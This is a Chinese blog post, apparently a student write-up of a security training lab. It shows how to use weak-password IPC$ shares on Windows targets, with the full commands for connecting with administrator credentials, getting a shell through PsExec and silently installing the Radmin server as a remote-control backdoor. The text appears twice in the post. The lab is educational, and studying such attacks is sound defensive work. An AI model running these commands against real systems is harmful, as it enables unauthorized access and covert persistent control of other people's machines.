(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制
2014-08-18 23:01
429 查看
这是在合天网安实验室一次的线上学习写出来的经验分享,很好的网站,也希望大家来学习交流
实验地址:http://erange.heetian.com/
实验对象:本科/专科信息安全专业
相关课程及专业:信息网络安全概论、计算机网络
实验时数(学分):2学时
实验类别:实践实验类
本实验要求实验者具备如下的相关知识。
IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行数据交换,从而实现对远程计算机的访问。IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。
net use \\远程主机IP “密码” /user: “用户名”与远程主机建立IPC$连接通道
net use z: \\远程主机ip\c$ 将远程主机的C盘影射为本地Z盘
copy e:\a.txt \\远程主机ip\c$ 拷贝本地文件e:\a.txt到远程主机
net use \\远程主机ip /del 删除与远程主机的IPC$连接。
正文开始
0x01.环境准备。
这是两台试验环境靶机的ip地址。
net share查看是否开启了ipc$。
都已经开启了。
net use \\10.1.1.28“mD4rkpdje” /user: “administrator” //与目标主机建立IPC$连接通道
net use z: \\10.1.1.28\c$ //将目标主机的C盘影射为本地Z盘
利用psexec工具获得对方的Shell。安装psexec工具,cmd中进入psexec.exe工具所在目录:
Psexec.exe \10.1.1.28–u administrator–p
mD4rkpdje cmd.exe;
这样就能在我自己的cmd中弹回一个28靶机的cmdshell回来,随意的执行命令。
我们用这个shell来进行安装r_server。
C:\r_server /install /pass:f4ck /:4899 /silence //安装命令
net
start r_server //启动命令
运行本地的Radmin输入刚才配置好的密码和端口(我这里是f4ck和
4899)便可以远程桌面受害靶机了。
实验地址:http://erange.heetian.com/
实验简介
实验所属系列:网络攻击与对抗实验对象:本科/专科信息安全专业
相关课程及专业:信息网络安全概论、计算机网络
实验时数(学分):2学时
实验类别:实践实验类
实验目的
1.了解IPC$漏洞原理
2.掌握IPC$漏洞攻击方法;
3.掌握psExec工具的使用;
4.掌握远程控制工具radmin的使用。
预备知识本实验要求实验者具备如下的相关知识。
IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行数据交换,从而实现对远程计算机的访问。IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。
net use \\远程主机IP “密码” /user: “用户名”与远程主机建立IPC$连接通道
net use z: \\远程主机ip\c$ 将远程主机的C盘影射为本地Z盘
copy e:\a.txt \\远程主机ip\c$ 拷贝本地文件e:\a.txt到远程主机
net use \\远程主机ip /del 删除与远程主机的IPC$连接。
正文开始
0x01.环境准备。
这是两台试验环境靶机的ip地址。
net share查看是否开启了ipc$。
都已经开启了。
net use \\10.1.1.28“mD4rkpdje” /user: “administrator” //与目标主机建立IPC$连接通道
net use z: \\10.1.1.28\c$ //将目标主机的C盘影射为本地Z盘
0x02.实施攻击
安装radmin软件,将安装目录下的r_server.exe、raddrv.dll、AdmDll.dll拷贝粘贴到映射的z盘,即远程主机的C盘。利用psexec工具获得对方的Shell。安装psexec工具,cmd中进入psexec.exe工具所在目录:
Psexec.exe \10.1.1.28–u administrator–p
mD4rkpdje cmd.exe;
这样就能在我自己的cmd中弹回一个28靶机的cmdshell回来,随意的执行命令。
我们用这个shell来进行安装r_server。
C:\r_server /install /pass:f4ck /:4899 /silence //安装命令
net
start r_server //启动命令
运行本地的Radmin输入刚才配置好的密码和端口(我这里是f4ck和
4899)便可以远程桌面受害靶机了。
相关文章推荐
- 利用网络平台资源推广一个活动的经验分享
- 20145314郑凯杰《网络对抗技术》可选实验 shellcode注入与Return-to-libc攻击实验
- 利用百度经验做网络推广经验分享
- 远程DNS缓存攻击__网络攻防实验三
- 实验吧笔记-IPC$管道攻击与防御方法
- 利用优化大师远程控制动态IP服务器
- Linux操作系统下利用SSH进行远程控制
- 怎样利用ipc$和默认共享入侵远程电脑
- 局域网内部安全测试--------利用弱密码控制远程计算机
- 局域网内部安全测试--------利用弱密码控制远程计算机
- .net开源我也开>>C#远程控制软件整个项目代码发布
- Linux操作系统下利用SSH进行远程控制
- 利用Windows2000实现远程控制
- 利用下载漏洞对数据库发起网络上的攻击
- 利用匿名管道实现远程CMD
- [Windows网络操作]Windows 系列操作系统远程控制
- Linux操作系统下利用SSH进行远程控制
- 网络安全:小心MSHTA漏洞为黑客开启远程控制之门
- [转]挑战黑客注入上传弱口令跨站攻击远程控制
- (帅)如何利用VNC远程图形界面控制Linux